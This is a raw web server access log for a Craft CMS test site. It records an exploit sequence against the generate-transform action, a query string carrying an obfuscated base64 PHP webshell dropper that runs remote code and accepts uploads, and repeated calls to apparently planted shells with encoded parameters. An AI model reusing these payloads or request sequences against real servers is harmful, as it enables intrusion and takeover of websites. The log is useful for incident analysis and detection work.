216.73.216.46 - - [21/Aug/2025:07:30:36 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Ftemplates%2F_layouts HTTP/2.0" 200 1414 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 95 0.003 "6428" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:30:39 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2F..%2Flog_bt.txt HTTP/2.0" 200 958 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 107 0.003 "2961" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:30:42 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F.%2Flog_bt.txt HTTP/2.0" 200 956 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 107 0.003 "2962" "0.003" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:32:10 -0400] "GET /assets/libs/slick/fonts/fonts/index.php?of=1 HTTP/2.0" 200 2287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3780 Safari/537.36 Edg/75.0.139" "62.164.177.242" 311 0.007 "5960" "0.006" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:32:44 -0400] "GET /order/files/2023-01/2023-01/2023-01/index.php?ARRAY=7o2230223n313735353737393536332p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737353936332q3131333866613037383964306236306366346361636164323033643433303136222p2232223n226139633238663532333333386531363438346662643664643833306562323233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p2262696r675s70617373223n2232342q34352q35352q36322q37392q38342q3139227q HTTP/2.0" 200 349 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/102.0" "62.164.177.242" 634 0.927 "1216" "0.928" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:35:18 -0400] "GET /?of=1 HTTP/2.0" 200 4403 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:103.0) Gecko/20100101 Firefox/101.0" "62.164.177.242" 252 0.008 "11057" "0.008" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:36:30 -0400] "GET /assets/libs/bootstrap-datetimepicker/css/css/index.php?ARRAY=7o2230223n313735353737393738392p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737363138392q3132393263396162663934333836373735653364666334346364623962363663222p2232223n223833346662316166383233643561303038666539396665616235653065333933222p2233223n226339633562653961386430343738323062363565643765653533613336383838222p2262696r675s70617373223n2232372q33362q35392q36362q37322q38392q3133227q HTTP/2.0" 200 346 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/83.0.1055.1 Safari/535.24" "62.164.177.242" 661 0.843 "1242" "0.843" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:37:33 -0400] "GET /cpresources/6df6f5d8/6df6f5d8/index.php?ARRAY=7o2230223n313735353737393835332p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737363235332q6530353231343961396436313663616563656435313765646538393839346438222p2232223n223031346663386163613765343933656137356231366430653863396262626332222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p2262696r675s70617373223n2232322q33362q35312q36322q37342q38322q3239227q HTTP/2.0" 200 307 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1" "62.164.177.242" 671 0.828 "975" "0.829" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:38:37 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.local%2F.. HTTP/2.0" 200 1693 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 304 0.008 "17701" "0.008" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:38:53 -0400] "GET / HTTP/2.0" 302 0 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2795.59 Safari/537.36" "2a0b:4141:820:88d::2" 397 0.516 "0" "0.516" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:38:54 -0400] "GET /shop/products HTTP/2.0" 200 6700 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2795.59 Safari/537.36" "2a0b:4141:820:88d::2" 408 0.592 "74727" "0.591" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:38:58 -0400] "GET / HTTP/2.0" 302 0 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2795.59 Safari/537.36" "2a0b:4141:820:88d::2" 633 0.515 "0" "0.515" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:38:59 -0400] "GET /shop/products HTTP/2.0" 200 6700 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2795.59 Safari/537.36" "2a0b:4141:820:88d::2" 694 0.796 "74727" "0.797" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:39:01 -0400] "POST /index.php?p=actions/assets/generate-transform HTTP/2.0" 500 174756 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2795.59 Safari/537.36" "2a0b:4141:820:88d::2" 876 0.524 "174756" "0.524" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:39:08 -0400] "GET /index.php?p=admin/dashboard&a=<?=file_put_contents(\x22c057546adf31.php\x22,base64_decode(\x22PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFWyJkIl0pPT0iXDYxXHgzN1w2MFw2Mlx4MzhcMTQ2XHgzNFw3MFw2N1wxNDNcMTQyXHgzMlwxNDFcNzBceDM0XHgzNlx4MzBcNjdceDM2XDY0XHgzNlx4NjRcMTQxXDYzXDE0MVwxNDRcNjNcNzBcNjdceDM4XDE0NVwxNDMiKXtlY2hvIlx4NmZceDZiIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUWyJpZCJdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4K\x22));die();?> HTTP/2.0" 302 0 "-" "PycURL/7.43.0.1 libcurl/7.86.0 OpenSSL/1.1.1 zlib/1.2.11 c-ares/1.18.1 libidn2/2.0.4 librtmp/2.3" "2a0b:4141:820:88d::2" 759 0.492 "0" "0.492" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:39:09 -0400] "GET /index.php?p=admin/dashboard HTTP/2.0" 302 0 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2795.59 Safari/537.36" "2a0b:4141:820:88d::2" 1113 0.444 "0" "0.444" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:39:10 -0400] "GET /admin/login HTTP/2.0" 200 16969 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2795.59 Safari/537.36" "2a0b:4141:820:88d::2" 1283 0.650 "59176" "0.650" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:39:14 -0400] "POST /index.php?p=actions/assets/generate-transform HTTP/2.0" 200 126 "https://test.newsite.space/admin/login" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2795.59 Safari/537.36" "2a0b:4141:820:88d::2" 1109 0.456 "157" "0.455" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:39:14 -0400] "GET /c057546adf31.php HTTP/2.0" 403 449 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2795.59 Safari/537.36" "2a0b:4141:820:88d::2" 1105 0.001 "859" "0.001" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:41:36 -0400] "GET /3534f/3534f/3534f/3534f/index.php?of=1 HTTP/2.0" 200 2319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0" "62.164.177.242" 275 0.007 "6111" "0.008" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:42:03 -0400] "GET /assets/libs/modal-video/modal-video/modal-video/index.php?ARRAY=7o2230223n313735353738303132322p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737363532322q6636653162383432373234666431646465366338613834363132653733363537222p2232223n226130373731303332363063353030353165646631646337623534643930613534222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p2262696r675s70617373223n2232382q34392q35362q36352q38302q38352q3236227q HTTP/2.0" 200 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:103.0) Gecko/20100101 Firefox/103.0" "62.164.177.242" 643 0.852 "1091" "0.852" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:45:43 -0400] "GET /f7c78/comfunctions.php?of=1 HTTP/2.0" 200 2104 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:71.0) Gecko/20100101 Firefox/71.0" "62.164.177.242" 260 0.008 "5462" "0.009" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:45:54 -0400] "GET /files/2023-01-24/2023-01-24/index.php?ARRAY=7o2230223n313735353738303335332p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737363735332q6237613462316236386432303236363332356436343366636132383931653166222p2232223n223037333339616637663931386432313139623433643361366661373232643333222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p2262696r675s70617373223n2232362q33352q35372q36382q37382q38362q3136227q HTTP/2.0" 200 308 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:72.0) Gecko/20100101 Firefox/72.0" "62.164.177.242" 622 0.882 "963" "0.882" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:46:58 -0400] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313735353738303431372p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737363831372q3864646139613534613337353761653733376662653064316565323065653431222p2232223n223437623162323664656332343866663133313436376562323262333263343433222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p2262696r675s70617373223n2232392q33342q35352q36312q37322q38352q3137227q HTTP/2.0" 200 298 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/102.0" "62.164.177.242" 627 0.888 "965" "0.888" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:47:41 -0400] "GET /?of=1 HTTP/2.0" 200 4403 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:103.0) Gecko/20100101 Firefox/102.0" "62.164.177.242" 251 0.007 "11057" "0.007" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:50:15 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.local%2Fshare HTTP/2.0" 200 1334 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 307 0.010 "5794" "0.010" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:50:27 -0400] "GET /70f7c/70f7c/70f7c/index.php?of=1 HTTP/2.0" 200 2289 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0.4 Mobile/15E148 Safari/604.1" "62.164.177.242" 313 0.007 "6081" "0.006" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:50:47 -0400] "GET /30a37/30a37/30a37/30a37/index.php?of=1 HTTP/2.0" 200 2313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:103.0) Gecko/20100101 Firefox/102.0" "62.164.177.242" 275 0.006 "5840" "0.006" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:51:27 -0400] "GET /?of=1 HTTP/2.0" 200 4403 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.3302.140 Safari/537.36 Edge/18.18960" "62.164.177.242" 287 0.006 "11057" "0.007" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:51:42 -0400] "GET /order/files/2023-07/c9b92769-9d4a-4fe2-90ce-e5c37234ab05/_68x16_crop_center-center_none/_68x16_crop_center-center_none/index.php?ARRAY=7o2230223n313735353738303730312p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737373130312q6332353930303232653337636564333930643761323133316131663963633864222p2232223n226235393865393834316534653639666536353030616365666336616236616530222p2233223n226135353937313439663862366163323838636265363861393231353766386233222p2262696r675s70617373223n2233302q33362q35352q36372q37392q38352q3230227q HTTP/2.0" 200 393 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Mobile/15E148 Safari/604.1" "62.164.177.242" 735 0.892 "1749" "0.892" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:51:45 -0400] "GET /?of=1 HTTP/2.0" 200 4403 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/10.0.4 Mobile/15E148 Safari/604.1" "62.164.177.242" 141 0.002 "11057" "0.002" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:51:49 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.local%2F. HTTP/2.0" 200 1328 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 303 0.004 "5730" "0.004" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:55:40 -0400] "GET /?ARRAY=7o2230223n313735353738303933392p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737373333392q3130316138623065353431373261383837313764363364366363356235323534222p2232223n223534313835386363633734306464336661653633386637643039343464383561222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p2262696r675s70617373223n2231352q34352q35332q36342q37372q38362q3135227q HTTP/2.0" 200 19 "-" "Mozilla/5.0 (iPad; U; CPU OS 4_3_4 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5" "62.164.177.242" 647 0.965 "15" "0.966" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:56:44 -0400] "GET /70f7c/70f7c/70f7c/70f7c/index.php?ARRAY=7o2230223n313735353738313030332p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737373430332q3664623335303432336635653436323239353239363962373435373363306137222p2232223n223735356265383738613266623062353766633165656233616236616538346138222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p2262696r675s70617373223n2231352q34392q35322q36392q37342q38362q3135227q HTTP/2.0" 200 341 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:103.0) Gecko/20100101 Firefox/103.0" "62.164.177.242" 626 0.953 "1100" "0.953" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:01:23 -0400] "GET /assets/libs/modal-video/modal-video/index.php?ARRAY=7o2230223n313735353738313238322p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737373638322q6162313231386465393866663630343037343437386263323730363537323633222p2232223n223734646562303961366664386239356135323736323732653530663034336565222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p2262696r675s70617373223n2232362q34392q35372q36342q37312q38342q3233227q HTTP/2.0" 200 317 "-" "Mozilla/5.0 (iPad; U; CPU OS 4_3_4 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5" "62.164.177.242" 677 1.029 "1021" "1.029" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:05:18 -0400] "GET /1cefc/1cefc/index.php?ARRAY=7o2230223n313735353738313531372p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737373931372q3334313638363932613338623736303866353239623937343165343061643230222p2232223n226634333765386335353731626365626430616264656332616632326266363333222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p2262696r675s70617373223n2232372q35302q35372q36312q37382q39302q3134227q HTTP/2.0" 200 295 "-" "Mozilla/5.0 (iPad; U; CPU OS 4_2_3 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5" "62.164.177.242" 660 0.942 "865" "0.943" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:06:20 -0400] "GET /files/2023-01-24/2023-01-24/index.php?ARRAY=7o2230223n313735353738313537392p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737373937392q6663383964323930663662636639303365666233373265313934653064383561222p2232223n223037333339616637663931386432313139623433643361366661373232643333222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p2262696r675s70617373223n2232362q33352q35372q36382q37382q38362q3136227q HTTP/2.0" 200 308 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.3282.140 Safari/537.36 Edge/18.17763" "62.164.177.242" 665 0.951 "963" "0.951" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:08:18 -0400] "GET /3534f/3534f/index.php?of=1 HTTP/2.0" 200 2075 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.5.1 Mobile/15E148 Safari/604.1" "62.164.177.242" 309 0.009 "5394" "0.009" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:11:06 -0400] "GET /cpresources/7683ad58/7683ad58/index.php?ARRAY=7o2230223n313735353738313836352p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737383236352q6230663135353238306639313434323338353633366366323533656133616333222p2232223n226132663166656537333965316161373165663532643664663936306263356236222p2233223n226339633562653961386430343738323062363565643765653533613336383838222p2262696r675s70617373223n2232362q33362q36302q36322q38302q38312q3133227q HTTP/2.0" 200 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0" "62.164.177.242" 628 1.064 "981" "1.064" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:14:34 -0400] "GET /files/2023-01-24/2023-01-24/index.php?of=1 HTTP/2.0" 200 2070 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/101.0" "62.164.177.242" 277 0.008 "5433" "0.007" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:15:11 -0400] "GET /cpresources/7683ad58/7683ad58/index.php?ARRAY=7o2230223n313735353738323131302p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737383531302q3763336631646339363963666539643835356337656330663330653362626263222p2232223n226132663166656537333965316161373165663532643664663936306263356236222p2233223n226339633562653961386430343738323062363565643765653533613336383838222p2262696r675s70617373223n2232362q33362q36302q36322q38302q38312q3133227q HTTP/2.0" 200 311 "-" "Mozilla/5.0 (iPad; U; CPU OS 4_3_4 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5" "62.164.177.242" 674 0.935 "981" "0.935" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:16:18 -0400] "GET /30a37/30a37/30a37/index.php?ARRAY=7o2230223n313735353738323137372p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737383537372q3238343039313866333830396237383231323735653536663538383264326239222p2232223n223464346661366466373461303363336165376262303338356632663062376536222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p2262696r675s70617373223n2233302q34372q35322q36342q37362q38382q3330227q HTTP/2.0" 200 337 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:72.0) Gecko/20100101 Firefox/72.0" "62.164.177.242" 615 1.029 "1062" "1.029" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:20:55 -0400] "GET /order/files/e60753fe-b850-46cb-99ff-fba79c92d0e4/e60753fe-b850-46cb-99ff-fba79c92d0e4/index.php?ARRAY=7o2230223n313735353738323435342p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737383835342q6237303336373332663930336538663538386531336664366135666162373938222p2232223n226236366330633537656335333463643535666132663864386461373664386430222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p2262696r675s70617373223n2231312q33322q35362q36352q37372q38372q3235227q HTTP/2.0" 200 382 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36" "62.164.177.242" 697 0.999 "1589" "0.999" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:08:23:06 -0400] "GET / HTTP/2.0" 302 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0" "2a0b:4141:820:88d::2" 366 0.504 "0" "0.504" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:08:23:06 -0400] "GET /shop/products HTTP/2.0" 200 6700 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0" "2a0b:4141:820:88d::2" 377 0.551 "74727" "0.551" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:08:23:16 -0400] "GET / HTTP/2.0" 302 0 "https://test.newsite.space/shop/products" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0" "2a0b:4141:820:88d::2" 862 0.574 "0" "0.575" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:08:23:17 -0400] "GET /shop/products HTTP/2.0" 200 6700 "https://test.newsite.space/shop/products" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0" "2a0b:4141:820:88d::2" 1055 0.616 "74727" "0.615" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:08:23:24 -0400] "POST /index.php?p=actions/assets/generate-transform HTTP/2.0" 500 174678 "https://test.newsite.space/shop/products" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0" "2a0b:4141:820:88d::2" 1222 0.443 "174678" "0.443" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:08:23:32 -0400] "GET /index.php?p=admin/dashboard&a=<?=file_put_contents(\x22c057546adf31.php\x22,base64_decode(\x22PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFWyJkIl0pPT0iXDYxXHgzN1w2MFw2Mlx4MzhcMTQ2XHgzNFw3MFw2N1wxNDNcMTQyXHgzMlwxNDFcNzBceDM0XHgzNlx4MzBcNjdceDM2XDY0XHgzNlx4NjRcMTQxXDYzXDE0MVwxNDRcNjNcNzBcNjdceDM4XDE0NVwxNDMiKXtlY2hvIlx4NmZceDZiIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUWyJpZCJdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4K\x22));die();?> HTTP/2.0" 302 0 "-" "PycURL/7.43.0.1 libcurl/7.86.0 OpenSSL/1.1.1 zlib/1.2.11 c-ares/1.18.1 libidn2/2.0.4 librtmp/2.3" "2a0b:4141:820:88d::2" 759 0.551 "0" "0.551" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:08:23:35 -0400] "GET /index.php?p=admin/dashboard HTTP/2.0" 302 0 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0" "2a0b:4141:820:88d::2" 1079 0.397 "0" "0.397" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:08:23:36 -0400] "GET /admin/login HTTP/2.0" 200 16966 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0" "2a0b:4141:820:88d::2" 756 0.552 "59174" "0.552" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:08:23:40 -0400] "POST /index.php?p=actions/assets/generate-transform HTTP/2.0" 200 126 "https://test.newsite.space/admin/login" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0" "2a0b:4141:820:88d::2" 1077 0.437 "157" "0.437" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:08:23:41 -0400] "GET /c057546adf31.php HTTP/2.0" 403 449 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0" "2a0b:4141:820:88d::2" 1069 0.001 "859" "0.001" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:24:16 -0400] "GET /robots.txt HTTP/2.0" 200 88 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 275 0.001 "98" "0.001" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:24:16 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2F.%2Fcache.php HTTP/2.0" 200 4777 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 115 0.009 "8010" "0.008" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:24:19 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fbootstrap.php HTTP/2.0" 200 1205 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 103 0.004 "3401" "0.005" "test.newsite.space"
